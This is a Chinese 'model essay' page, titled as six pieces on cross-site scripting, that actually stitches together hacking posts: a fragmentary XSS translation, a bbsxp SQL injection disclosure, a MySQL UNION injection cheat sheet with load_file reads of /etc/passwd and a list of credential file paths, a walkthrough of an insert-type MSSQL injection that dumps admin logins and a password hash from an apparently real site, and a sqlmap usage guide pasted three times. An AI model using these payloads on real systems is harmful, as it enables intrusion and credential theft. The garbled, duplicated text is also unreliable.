当前位置: 查字典范文网 >> 2023年跨站脚本的原理(六篇)

2023年跨站脚本的原理(六篇)

格式:DOC 上传日期:2023-01-27 19:00:24
2023年跨站脚本的原理(六篇)
时间:2023-01-27 19:00:24     小编:zdfb

每个人都曾试图在平淡的学习、工作和生活中写一篇文章。写作是培养人的观察、联想、想象、思维和记忆的重要手段。大家想知道怎么样才能写一篇比较优质的范文吗?以下是小编为大家收集的优秀范文,欢迎大家分享阅读。

跨站脚本的原理篇一

译者:riusksk(泉哥)

漏洞分析

本篇分析介绍了不同领域下的xss注入攻击,这里没有使用xss cheatsheat.现在让我们开始详细分析它,本次实例的目标是sectheory安全咨询站点。这个过程使用了两种不同的方法,这将使一些安全公司受到微创,同时也有利于新的exploitation类型的确立。两者的结果是相同的,只是方式不一样。

们通过寻找安全漏洞并利用它来进行网站攻击。我个人总是习惯使用两种方法来踩点:

banging:在url中注入输入参数。

2.  form. splitting:在form表单中注入伪造的参数,

关键代码:

your phone number:

your email address:

。。。。。

注入以下代码

telnet

跨站脚本的原理篇二

by:sobiny[b.c.t]

提交给bbsxp的漏洞公告,官方一点反映都没呢,。

其实主要是他们一个类型的注入太多了。

我都不好意思发出来,发多了手痛。

哎,举例一个。

文件

127.0.0.1/?menu=result&forumid=1&keywords=aaaaa&item=threadid&datecomparer=365&sortby=desc/**/union&verifycode=8149

if request(“menu”)=“result” then

keywords=htmlencode(request(“keywords”))

sortby=htmlencode(request(“sortby”))

item=htmlencode(request(“item”))

if keywords=“” then error(“您没有输入任何查询条件!”)

if request(“verifycode”)session(“verifycode”) or session(“verifycode”)=“” then

error(“验证码错误!”)

sqlsearch=“isapproved=1 and isdel=0 and ”&item&“ like %”&keywords&“% ”

if datecomparer >0 then sqlsearch=sqlsearch&“ and

posttime>”&sqlnowstring&“-”&datecomparer&“ ”

if forumid >0 then sqlsearch=sqlsearch&“ and forumid=”&forumid&“ ”

sql=“select * from [bbsxp_threads] where ”&sqlsearch&“ order by threadid

”&sortby&“”

sql,conn,1

……………………

我汗死,一个语句中,有两个地方可以注入,bbsxp简直太有才了,

他们不把这类型的漏洞补了

我还真不准备看了,太多了,bug。

跨站脚本的原理篇三

记得之前园长说不知道mysql5.0以上的iformation_schema表的结构就说自己懂得注入的是很 的事情,于是了解了一番。

mysql5内置的系统数据库iformation_schema,其结构如mssql中的master数据库,其

中记录了mysql中所有

存在数据库名、数据库表、表字段。重点要求研究几个对sql注入有用的数据表说

明。

1.得到所有数据库名:

|schemata ->存储数据库名的表

|—字段:schema_name ->数据库名称

|tables ->存储表名

|—字段:table_schema ->表示该表名属于哪个数据库名

|—字段:table_name ->存储表的表名

|columns ->存储的字段名表

|—字段:table_schema ->该字段所属数据库名

|—字段:table_name ->存储所属表的名称

|—字段:column_name ->该字段的名称

#########################################################################

##

0×001 获取系统信息:

union select 1,2,3,4,5,concat

(@@n_compile_os,0x3c62723e,@@datadir,0x3c62723e,user

,0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*

@@n_compile_os 获取系统版本

@@datadir 数据库路径

database() 当前数据库名称

0x3c62723e 换行hex值

*/

######################################################################

0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from

where table_schema=0x67617264656e /*

/*

0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################

0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from

s where table_name=0x61646d696e and

table_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段

0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/

#####################################################################

0×004 获取数据

union select 1,2,3

,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat

(adpassword),6,7,8 from admin

/*

0x3c62723e 换行符号hex编码

group_concat 同时获得该字段所有数据

*/

顺便添加一些mysql注入时非常有用的一些东西

简单介绍mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(root为最高,相当于mssql中的sa)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名

2:user()       用户名

3:current_user() 当前用户名

4:session_user()连接数据库的用户名

5:database()   数据库名

6:version()    mysql数据库版本

7:load_file()  mysql读取本地文件的函数

8:@@datadir    读取数据库路径

9:@@basedir   mysql 安装路径

10:@@version_compile_os  操作系统 windows server ,

收集的一些路径:

windows下:

c:/         //查看系统版本

c:/windows/  //php配置信息

c:/windows/   //mysql配置文件,记录管理员登陆过的mysql用户名和密码

c:/winnt/

c:/winnt/

c:\mysql\data\mysql\ //表中的数据库连接密码

c:\program files\\serv-u\ //存储了虚拟主机网站路径和密码

c:\program files\serv-u\

c:\windows\system32\inetsrv\ //iis配置文件

c:\windows\repair\sam //存储了windows系统初次安装的密码

c:\program files\ serv-u\ //6.0版本以前的serv-u管理员密码存储于此

c:\program files\\

c:\documents and settings\all users\application data\symantec\pcanywhere\*.cif文件

//存储了pcanywhere的登陆密码

c:\program files\apache group\apache\conf \ 或c:\apache\conf \ //查看    windows系统apache文件

c:/resin-3.0.14/conf/  //查看jsp开发的网站 resin文件配置信息.

c:/resin/conf/     /usr/local/resin/conf/ 查看linux系统配置的jsp虚拟主机

d:\apache\apache2\conf\

c:\program files\mysql\

c:\windows\system32\inetsrv\ 查看iis的虚拟主机配置

c:\mysql\data\mysql\ 存在mysql系统中的用户密码

lunix/unix下:

/usr/local/app/apache2/conf/ //apache2缺省配置文件

/usr/local/apache2/conf/

/usr/local/app/apache2/conf/extra/ //虚拟网站设置

/usr/local/app/php5/lib/ //php相关设置

/etc/sysconfig/iptables //从中得到防火墙规则策略

/etc/httpd/conf/ // apache配置文件

/etc/ //同步程序配置文件

/etc/ //mysql的配置文件

/etc/redhat-release //系统版本

/etc/issue

/etc/

/usr/local/app/php5/lib/ //php相关设置

/usr/local/app/apache2/conf/extra/ //虚拟网站设置

/etc/httpd/conf/或/usr/local/apche/conf/ 查看linux apache虚拟主机配置文件

/usr/local/resin-3.0.22/conf/ 针对3.0.22的resin配置文件查看

/usr/local/resin-pro-3.0.22/conf/ 同上

/usr/local/app/apache2/conf/extra/ apashe虚拟主机查看

/etc/httpd/conf/或/usr/local/apche/conf/ 查看linux apache虚拟主机配置文件

/usr/local/resin-3.0.22/conf/ 针对3.0.22的resin配置文件查看

/usr/local/resin-pro-3.0.22/conf/ 同上

/usr/local/app/apache2/conf/extra/ apashe虚拟主机查看

/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出freebsd,sunos系统根目录

replace(load_file(0x2f6574632f706173737764),0x3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个php文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

跨站脚本的原理篇四

author:昆仑男银

群里有人在问insert型的怎么注射,insert类型的我还没碰到过呢,就去看了看,做了一下笔记备忘,

/?proid=49579 加一个点,报错

是insert类型的语句,百度了一下,对insert语句的注射大致有个了解,于是开始刺探信息。

提交:/?proid=49579,cast(@@version/**/as/**/int),null);--

不兼容...把int换成varchar,页面返回正常。。。百度一下,原来是mssql不允许将text或ntext型数据直接转换为int型

要想爆出信息看来得找个varchar 或nvarchar类型的字段,把后面2个对换了一下位置,成功爆出。

提交:/?proid=49579,null,cast(system_user/**/as/**/int));--

在将 nvarchar 值 afdatalogin 转换成数据类型 int 时失败。

很好,再接着爆信息,收集的一些如下。

version:microsoft sql server - 9.00.4035.00 (intel x86)......edition on windows nt 5.2 (build 3790: service pack 2)

servername:sql2005

host_name:ibm1

db_name:kunlun

user_name:dbo

可以看出 web与数据库分离,看来想差异备份或log备份是不行的了,只能爆后台帐号、密码进后台了。

先爆一下库,构造

/?proid=49579,null,null);select/**/name/**/from/**/abases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/abases/**/where/**/dbid=1)--

修改第最后一个dbid的值,爆出13个库...

1:master

2:tempdb

3:model

4:msdb

5:kunlun_bbs

6:kunlun

7:new_af

8:af_back

9:console

10:newkunlun

11:newkunlun2

12:oldkunlun

13:newbbs

接下来爆表名

构造: /?proid=49579,null,null);select/**/name/**/from/**/abases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype=u/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype=u))--

修改第二个top的值,从0递增上去,

爆第六张表时很开心,马上去爆字段、密码。

1:af_useraccount

2:yx_unit

3:af_unioncompany

4:yx_flashxz

5:af_userpointlogs

6:buy_admin

爆指定表buy_admin的字段

/?proid=49579,null,null);select/**/name/**/from/**/abases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=buy_admin)/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=buy_admin)))--

爆出来了,一样是修改第二个top的值。

密码:af_apass

id:af_id

用户:af_aname

看到name和pass很开心啊,马上爆内容。

提交:

/?proid=49579,null,null);select/**/*/**/from/**/buy_admin/**/where/**/af_id=2/**/and/**/1=(select/**/af_aname/**/from/**/buy_admin/**/where/**/af_id=2)--

爆出来了,还是明文的,呵呵,找后台登录。

hjbadmin  hjbmanager

yck     yck

高兴早了,怎么也登录不了。唉,再爆表把,爆到第n张,看见yx_manage,开心了,这回没错了,爆字段爆内容

yx_adminuser yx_pwd

hgnadmin 50252ec697150cc9aa69a47333c716b8

可惜啊,md5解密不出....到这里差不多就结束了。很晚了。

哦,忘了说了,这个是dbo权限,呵呵。

跨站脚本的原理篇五

工具提供sqlmap0.9版本、、

获取数据库名

./ -u “?nid=14550″

–user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0;

.net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr

3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” –dbs

获取表名

./ -u “?nid=14550″

–user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0;

.net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr

3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” -d database

–tables

获取列名

./ -u “?nid=14550″

–user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0;

.net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr

3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” -d database -t

cdb_adminactions –columns

获取值

./ -u “?nid=14550″

–user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0;

.net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr

3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” -d database -t

cdb_members -c username,password –dump

svn checkout /sqlmap/trunk/sqlmap

sqlmap-dev

-u “/?cityid=2&m=1″

-v 1 –sql-shell //执行sql语句

-u “/?cityid=2&m=1″

-v 5 //更详细的信息

load options from a configuration ini file

sqlmap -c

使用post方法提交

-u “/sqlmap/oracle/”

–method post –data “id=1″

使用cookies方式提交,cookie的值用;分割,可以使用tamperdata来抓cookies

python -u “/sqlmap/mssql/”

–cookie “id=1″ -v 1

使用referer欺骗

python -u “/sqlmap/pgsql/?id=1″

–referer “” -v 3

使用自定义user-agent,或者使用随机使用自带的

python -u “/sqlmap/oracle/?id=1″

–user-agent “mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)” -v

3

python -u “/sqlmap/mysql/?id=1″

-v 1 -a “./txt/”

使用基本认证

python -u “/sqlmap/mysql/basic/?id=1″

–auth-type basic –auth-cred “testuser:testpass” -v 3

使用digest认证

python -u “/sqlmap/mysql/digest/?id=1″

–auth-type digest –auth-cred “testuser:testpass” -v 3

使用代理,配合tor

python -u “/sqlmap/pgsql/?id=1″

–proxy “192.168.1.47:3128″

python

-u “/sqlmap/pgsql/?id=1″

–proxy “192.168.1.47:8118″

使用多线程猜解

python -u “/sqlmap/mysql/?id=1″

-v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python -u “/sqlmap/pgsql/?id=1″

-v 1 -p “id

python -u “/sqlmap/pgsql/?id=1&cat=2″

-v 1 -p “cat,id”

python -u “/sqlmap/mysql/”

-v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 ()”

指定数据库,绕过sqlmap的自动检测

python -u “/sqlmap/pgsql/?id=1″

-v 2 –dbms “postgresql”

* mysql

* oracle

* postgresql

*

microsoft sql server

指定操作系统,绕过sqlmap自动检测

python -u “/sqlmap/pgsql/?id=1″

-v 2 –os “windows”

* linux

* windows

自定义payload

options:

–prefix and –postfix

in some circumstances the vulnerable parameter is

exploitable only if the user provides a postfix to be appended to the injection

payload. another scenario where these options come handy presents itself when

the user already knows that query syntax and want to detect and exploit the sql

injection by directly providing a injection payload prefix and/or

postfix.

example on a mysql 5.0.67 target on a page where the sql query

is: $query = “select * from users where id=(‘” . $_get[id] . “‘) limit 0,

1″;:

$ python -u “/sqlmap/mysql/?id=1″

-v 3 -p “id” –prefix “‘” –postfix “and

‘test’=test”

[...]

[hh:mm:16] [info] testing sql injection on get

parameter ‘id’ with 0 parenthesis

[hh:mm:16] [info] testing custom injection

on get parameter ‘id’

[hh:mm:16] [traffic out] http request:

get

/sqlmap/mysql/?id=1%27%29%20and%207433=7433%20and%20

%28%27test%27=%27test

http/1.1

accept-charset: iso-8859-15,utf-8;q=0.7,*;q=0.7

host:

:80

accept-language: en-us,en;q=0.5

accept:

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

user-agent:

sqlmap/0.7rc1 ()

connection:

close

[...]

[hh:mm:17] [info] get parameter ‘id’ is custom

injectable

[...]

as you can see, the injection payload for testing for

custom injection

is:

id=1%27%29%20and%207433=7433%20and%20%28%27test%27=%27test

which

url decoded is:

id=1′) and 7433=7433 and (‘test’=test

and makes

the query syntatically correct to the page query:

select * from users

where id=(’1′) and 7433=7433 and (‘test’=test’) limit 0, 1

in this

simple example, sqlmap could detect the sql injection and exploit it without

need to provide a custom injection payload, but sometimes in the real world

application it is necessary to provide it.

页面比较

python -u “/sqlmap/mysql/?id=1″

–string “luther” -v 1

python -u “/sqlmap/mysql/?id=1″

–regexp “ lu[w][w]er” -v

排除网站的内容

python -u “/sqlmap/mysql/?id=1″

–excl-reg “dynamic content: ([d]+)”

多语句测试,php内嵌函数mysql_query,不支持多语句

python -u “/sqlmap/mysql/?id=1″

–stacked-test -v 1

union注入测试

python -u “/sqlmap/oracle/?id=1″

–union-test -v 1

unionz注入配合orderby

python -u “/sqlmap/pgsql/?id=1″

–union-test –union-tech orderby -v 1

python -u “/sqlmap/mssql/?id=1″

-v 1 –union-use –banner

python -u “/sqlmap/mysql/?id=1″

-v 5 –union-use –current-user

python -u “/sqlmap/mysql/?id=1″

-v 1 –union-use –dbs

fingerprint

python -u “/sqlmap/mssql/?id=1″

-v 1 -f

python -u “192.168.123.36/sqlmap/?name=luther”

-v 1 -f -b

判断当前用户是否是dba

python -u “/sqlmap/pgsql/?id=1″

–is-dba -v 1

列举数据库用户

python -u “/sqlmap/pgsql/?id=1″

–users -v 0

列举数据库用户密码

python -u “/sqlmap/mysql/?id=1″

–passwords -v 0

python -u “/sqlmap/mssql/?id=1″

–passwords -u sa -v 0

查看用户权限

python -u “/sqlmap/oracle/?id=1″

–privileges -v 0

python -u “/sqlmap/pgsql/?id=1″

–privileges -u postgres -v 0

列数据库

python -u “/sqlmap/mssql/?id=1″

–dbs -v 0

列出指定数据库指定表的列名

python -u “/sqlmap/mysql/?id=1″

–columns -t users -d test -v 1

列出指定数据库的指定表的指定列的内容

python -u “/sqlmap/mssql/?id=1″

–dump -t users -d master -c surname -v 0

指定列的范围从2-4

python -u “/sqlmap/mysql/?id=1″

–dump -t users -d test –start 2 –stop 4 -v 0

导出所有数据库,所有表的内容

python -u “/sqlmap/mysql/?id=1″

–dump-all -v 0

只列出用户自己新建的数据库和表的内容

python -u “/sqlmap/mssql/?id=1″

–dump-all –exclude-sysdbs -v 0

sql query

python -u “/sqlmap/pgsql/?id=1″

–sql-query “select usename from pg_user” -v 0

python -u “/sqlmap/mysql/?id=1″

–sql-query “select host, password from limit 1, 3″ -v

1

select usename, passwd from pg_shadow order by usename

保存和恢复会话

python -u “/sqlmap/pgsql/?id=1″

-b -v 1 -s “”

保存选项到inc配置文件

python -u “/sqlmap/pgsql/?id=1″

-b -v 1 –save

获取数据库名:

./ -u “?nid=14550” --user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” --dbs

获取表名:

./ -u “?nid=14550” --user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” -d database --tables

获取列名

./ -u “?nid=14550” --user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” -d database -t cdb_adminactions --columns

获取值

./ -u “?nid=14550” --user-agent “mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)” -d database -t cdb_members -c username,password --dump

更新

svn checkout /sqlmap/trunk/sqlmap sqlmap-dev

-u “/?cityid=2&m=1” -v 1 --sql-shell //执行sql语句

-u “/?cityid=2&m=1” -v 5 //更详细的信息

load options from a configuration ini file

sqlmap -c 

使用post方法提交

-u “/sqlmap/oracle/” --method post --data “id=1”

使用cookies方式提交,cookie的值用;分割,可以使用tamperdata来抓cookies

python  -u “/sqlmap/mssql/” --cookie “id=1” -v 1

使用referer欺骗

python -u “/sqlmap/pgsql/?id=1” --referer “” -v 3

使用自定义user-agent,或者使用随机使用自带的

python -u “/sqlmap/oracle/?id=1” --user-agent “mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)” -v 3

python -u “/sqlmap/mysql/?id=1” -v 1 -a “./txt/”

使用基本认证

python -u “/sqlmap/mysql/basic/?id=1” --auth-type basic --auth-cred “testuser:testpass” -v 3

使用digest认证

python -u “/sqlmap/mysql/digest/?id=1” --auth-type digest --auth-cred “testuser:testpass” -v 3

使用代理,配合tor

python -u “/sqlmap/pgsql/?id=1” --proxy “192.168.1.47:3128”

python -u “/sqlmap/pgsql/?id=1” --proxy “192.168.1.47:8118”

使用多线程猜解

python -u “/sqlmap/mysql/?id=1” -v 1 --current-user --threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python  -u “/sqlmap/pgsql/?id=1” -v 1 -p “id

python -u ”/sqlmap/pgsql/?id=1&cat=2“ -v 1 -p ”cat,id“

python -u ”/sqlmap/mysql/“ -v 1 -p ”user-agent“ --user-agent ”sqlmap/0.7rc1 ()“

指定数据库,绕过sqlmap的自动检测

python  -u ”/sqlmap/pgsql/?id=1“ -v 2 --dbms ”postgresql“

* mysql

* oracle

* postgresql

* microsoft sql server

指定操作系统,绕过sqlmap自动检测

python -u ”/sqlmap/pgsql/?id=1“ -v 2 --os ”windows“

* linux

* windows

自定义payload

options: --prefix and --postfix

in some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the sql injection by directly providing a injection payload prefix and/or postfix.

example on a mysql 5.0.67 target on a page where the sql query is: $query = ”select * from users where id=(“ . $_get[id] . ”) limit 0, 1“;:

$ python -u ”/sqlmap/mysql/?id=1“ -v 3 -p ”id“ --prefix ”“ --postfix ”and test=test“

[...]

[hh:mm:16] [info] testing sql injection on get parameter id with 0 parenthesis

[hh:mm:16] [info] testing custom injection on get parameter id

[hh:mm:16] [traffic out] http request:

get /sqlmap/mysql/?id=1%27%29%20and%207433=7433%20and%20

%28%27test%27=%27test http/1.1

accept-charset: iso-8859-15,utf-8;q=0.7,*;q=0.7

host: :80

accept-language: en-us,en;q=0.5

accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

user-agent: sqlmap/0.7rc1 ()

connection: close

[...]

[hh:mm:17] [info] get parameter id is custom injectable

[...]

as you can see, the injection payload for testing for custom injection is:

id=1%27%29%20and%207433=7433%20and%20%28%27test%27=%27test

which url decoded is:

id=1) and 7433=7433 and (test=test

and makes the query syntatically correct to the page query:

select * from users where id=(1) and 7433=7433 and (test=test) limit 0, 1

in this simple example, sqlmap could detect the sql injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python  -u ”/sqlmap/mysql/?id=1“ --string ”luther“ -v 1

python -u ”/sqlmap/mysql/?id=1“ --regexp ”lu[w][w]er“ -v

排除网站的内容

python -u ”/sqlmap/mysql/?id=1“ --excl-reg ”dynamic content: ([d]+)“

多语句测试,php内嵌函数mysql_query(),不支持多语句

python  -u ”/sqlmap/mysql/?id=1“ --stacked-test -v 1

union注入测试

python -u ”/sqlmap/oracle/?id=1“ --union-test -v 1

unionz注入配合orderby

python -u ”/sqlmap/pgsql/?id=1“ --union-test --union-tech orderby -v 1

python -u ”/sqlmap/mssql/?id=1“ -v 1 --union-use --banner

python -u ”/sqlmap/mysql/?id=1“ -v 5 --union-use --current-user

python -u ”/sqlmap/mysql/?id=1“ -v 1 --union-use --dbs

fingerprint

python -u ”/sqlmap/mssql/?id=1“ -v 1 -f

python  -u ”192.168.123.36/sqlmap/?name=luther“ -v 1 -f -b

判断当前用户是否是dba

python -u ”/sqlmap/pgsql/?id=1“ --is-dba -v 1

列举数据库用户

python -u ”/sqlmap/pgsql/?id=1“ --users -v 0

列举数据库用户密码

python -u ”/sqlmap/mysql/?id=1“ --passwords -v 0

python  -u ”/sqlmap/mssql/?id=1“ --passwords -u sa -v 0

查看用户权限

python -u ”/sqlmap/oracle/?id=1“ --privileges -v 0

python -u ”/sqlmap/pgsql/?id=1“ --privileges -u postgres -v 0

列数据库

python -u ”/sqlmap/mssql/?id=1“ --dbs -v 0

列出指定数据库指定表的列名

python -u ”/sqlmap/mysql/?id=1“ --columns -t users -d test -v 1

列出指定数据库的指定表的指定列的内容

python -u ”/sqlmap/mssql/?id=1“ --dump -t users -d master -c surname -v 0

指定列的范围从2-4

python -u ”/sqlmap/mysql/?id=1“ --dump -t users -d test --start 2 --stop 4 -v 0

导出所有数据库,所有表的内容

python -u ”/sqlmap/mysql/?id=1“ --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python -u ”/sqlmap/mssql/?id=1“ --dump-all --exclude-sysdbs -v 0

sql query

python -u ”/sqlmap/pgsql/?id=1“ --sql-query ”select usename from pg_user“ -v 0

python -u ”/sqlmap/mysql/?id=1“ --sql-query ”select host, password from limit 1, 3“ -v 1

select usename, passwd from pg_shadow order by usename

保存和恢复会话

python -u ”/sqlmap/pgsql/?id=1“ -b -v 1 -s ”“

保存选项到inc配置文件

python -u ”/sqlmap/pgsql/?id=1“ -b -v 1 --save

获取数据库名

./ -u ”?nid=14550“ --user-agent ”mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)“ --dbs获取表名

./ -u ”?nid=14550“ --user-agent ”mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)“ -d database --tables

获取列名

./ -u ”?nid=14550“ --user-agent ”mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)“ -d database -t cdb_adminactions --columns

获取值

./ -u ”?nid=14550“ --user-agent ”mozilla/4.0 (compatible; msie 8.0; windows nt 5.2; trident/4.0; .net clr 1.1.4322; .net clr 2.0.50727; .net clr 3.0.04506.648; .net clr 3.5.21022; .net clr 3.0.4506.2152; .net clr 3.5.30729)“ -d database -t cdb_members -c username,password --dump

来源:影子

更新

svn checkout /sqlmap/trunk/sqlmap -u ”/?cityid=2&m=1“ -v 1 --sql-shell //执行sql语句

-u ”/?cityid=2&m=1“ -v 5 //更详细的信息

load options from a configuration ini file

sqlmap -c 使用post方法提交

-u ”/sqlmap/oracle/“ --method post --data ”id=1“使用cookies方式提交,cookie的值用;分割,可以使用tamperdata来抓cookies

python  -u ”/sqlmap/mssql/“ --cookie ”id=1“ -v 1使用referer欺骗

python -u ”/sqlmap/pgsql/?id=1“ --referer ”“ -v 3使用自定义user-agent,或者使用随机使用自带的

python -u ”/sqlmap/oracle/?id=1“ --user-agent ”mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)“ -v 3python -u ”/sqlmap/mysql/?id=1“ -v 1 -a ”./txt/“

使用基本认证

python -u ”/sqlmap/mysql/basic/?id=1“ --auth-type basic --auth-cred ”testuser:testpass“ -v 3使用digest认证

python -u ”/sqlmap/mysql/digest/?id=1“ --auth-type digest --auth-cred ”testuser:testpass“ -v 3使用代理,配合tor

python -u ”/sqlmap/pgsql/?id=1“ --proxy ”192.168.1.47:3128“

python -u ”/sqlmap/pgsql/?id=1“ --proxy ”192.168.1.47:8118“使用多线程猜解

python -u ”/sqlmap/mysql/?id=1“ -v 1 --current-user --threads 3绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python  -u ”/sqlmap/pgsql/?id=1“ -v 1 -p ”id

python -u “/sqlmap/pgsql/?id=1&cat=2” -v 1 -p “cat,id”

python -u “/sqlmap/mysql/” -v 1 -p “user-agent” --user-agent “sqlmap/0.7rc1 ()”指定数据库,绕过sqlmap的自动检测

python  -u “/sqlmap/pgsql/?id=1” -v 2 --dbms “postgresql”* mysql

* oracle

* postgresql

* microsoft sql server指定操作系统,绕过sqlmap自动检测

python -u “/sqlmap/pgsql/?id=1” -v 2 --os “windows”* linux

* windows自定义payload

options: --prefix and --postfixin some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the sql injection by directly providing a injection payload prefix and/or postfix.

example on a mysql 5.0.67 target on a page where the sql query is: $query = “select * from users where id=(” . $_get[id] . “) limit 0, 1”;:

$ python -u “/sqlmap/mysql/?id=1” -v 3 -p “id” --prefix “” --postfix “and test=test”

[...]

[hh:mm:16] [info] testing sql injection on get parameter id with 0 parenthesis

[hh:mm:16] [info] testing custom injection on get parameter id

[hh:mm:16] [traffic out] http request:

get /sqlmap/mysql/?id=1%27%29%20and%207433=7433%20and%20

%28%27test%27=%27test http/1.1

accept-charset: iso-8859-15,utf-8;q=0.7,*;q=0.7

host: :80

accept-language: en-us,en;q=0.5

accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

user-agent: sqlmap/0.7rc1 ()

connection: close

[...]

[hh:mm:17] [info] get parameter id is custom injectable

[...]as you can see, the injection payload for testing for custom injection is:

id=1%27%29%20and%207433=7433%20and%20%28%27test%27=%27test

which url decoded is:

id=1) and 7433=7433 and (test=test

and makes the query syntatically correct to the page query:

select * from users where id=(1) and 7433=7433 and (test=test) limit 0, 1

in this simple example, sqlmap could detect the sql injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python  -u “/sqlmap/mysql/?id=1” --string “luther” -v 1

python -u “/sqlmap/mysql/?id=1” --regexp “lu[w][w]er” -v排除网站的内容

python -u “/sqlmap/mysql/?id=1” --excl-reg “dynamic content: ([d]+)”多语句测试,php内嵌函数mysql_query(),不支持多语句

python  -u “/sqlmap/mysql/?id=1” --stacked-test -v 1union注入测试

python -u “/sqlmap/oracle/?id=1” --union-test -v 1unionz注入配合orderby

python -u “/sqlmap/pgsql/?id=1” --union-test --union-tech orderby -v 1python -u “/sqlmap/mssql/?id=1” -v 1 --union-use --banner

python -u “/sqlmap/mysql/?id=1” -v 5 --union-use --current-user

python -u “/sqlmap/mysql/?id=1” -v 1 --union-use --dbsfingerprint

python -u “/sqlmap/mssql/?id=1” -v 1 -f

python  -u “192.168.123.36/sqlmap/?name=luther” -v 1 -f -b判断当前用户是否是dba

python -u “/sqlmap/pgsql/?id=1” --is-dba -v 1列举数据库用户

python -u “/sqlmap/pgsql/?id=1” --users -v 0

列举数据库用户密码

python -u “/sqlmap/mysql/?id=1” --passwords -v 0

python  -u “/sqlmap/mssql/?id=1” --passwords -u sa -v 0查看用户权限

python -u “/sqlmap/oracle/?id=1” --privileges -v 0

python -u “/sqlmap/pgsql/?id=1” --privileges -u postgres -v 0列数据库

python -u “/sqlmap/mssql/?id=1” --dbs -v 0列出指定数据库指定表的列名

